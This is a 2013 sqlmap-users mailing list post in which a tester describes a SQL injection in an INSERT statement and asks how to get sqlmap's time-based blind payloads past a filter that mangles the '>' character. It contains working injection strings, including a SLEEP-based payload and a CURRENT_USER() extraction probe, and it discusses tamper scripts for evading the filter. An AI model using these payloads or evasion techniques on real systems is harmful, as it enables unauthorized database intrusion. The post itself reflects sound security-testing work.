[sqlmap-users] Server replaces some chars

Sat, 01 Jun 2013 13:18:01 -0700 

Hey guys, I have a server at work where there's an SQLi in an INSERT, 
but I can't prove that it's actually a threat so far due to a little 
"filter" that replaces some input characters.
I crafted a little injection that injects a sleep into the insert, and 
makes it sleep for 10 seconds, and then doesn't insert anything (due to 
a duplicate error that I made sure to get).

The original query looks like this:

insert into discount_phone_registry (phone_nbr,reg_date) values 
('111',date(now()));.
And the injection is in the phone_nbr, so I made the following 
injection: 111',(SLEEP(10))),('111
And it then becomes: insert into discount_phone_registry 
(phone_nbr,reg_date) values ('111',(SLEEP(10))),('111',date(now()))
So, so far so good, right?

Well when I wanted to use sqlmap, I noticed that our filter is doing 
some stupid things ^^
This is the payload from sqlmap

111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))>16),SLEEP(5),9457)/**/)),('

But as it gets submitted in the form, it becomes

111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))_16),SLEEP(5),9457)/**/)),('

Notice how the > became a _
The tampering scripts I'm using are space2comment and charencode, and 
charencode actually seems to trick it, since I'm getting the less/grater 
char in the error output from the web server now.
If I copy/paste the payload directly from the web server error output, 
directly into the MySQL client and run it, it works.

Is there anything else I can try to get this to work?

PS: If it helps I just noticed this!

1064 - You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use 
near ';16),SLEEP(5),9457)/**/)),('',date(now()))' at line 1
insert into discount_phone_registry (phone_nbr,reg_date) values 
('111',(SELECT/**/1/**/AND/**/9457=IF((ORD(MID((IFNULL(CAST(CURRENT_USER()/**/AS/**/CHAR),0x20)),1,1))<16),SLEEP(5),9457)/**/)),('',date(now()))

Notice how it complains on ";16" which is probably the encoded > sign 
(&gt;).

Thanks in advance! :-)




------------------------------------------------------------------------------
Get 100% visibility into Java/.NET code with AppDynamics Lite
It's a free troubleshooting tool designed for production
Get down to code-level detail for bottlenecks, with <2% overhead.
Download for free and get started troubleshooting in minutes.
http://p.sf.net/sfu/appdyn_d2d_ap2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to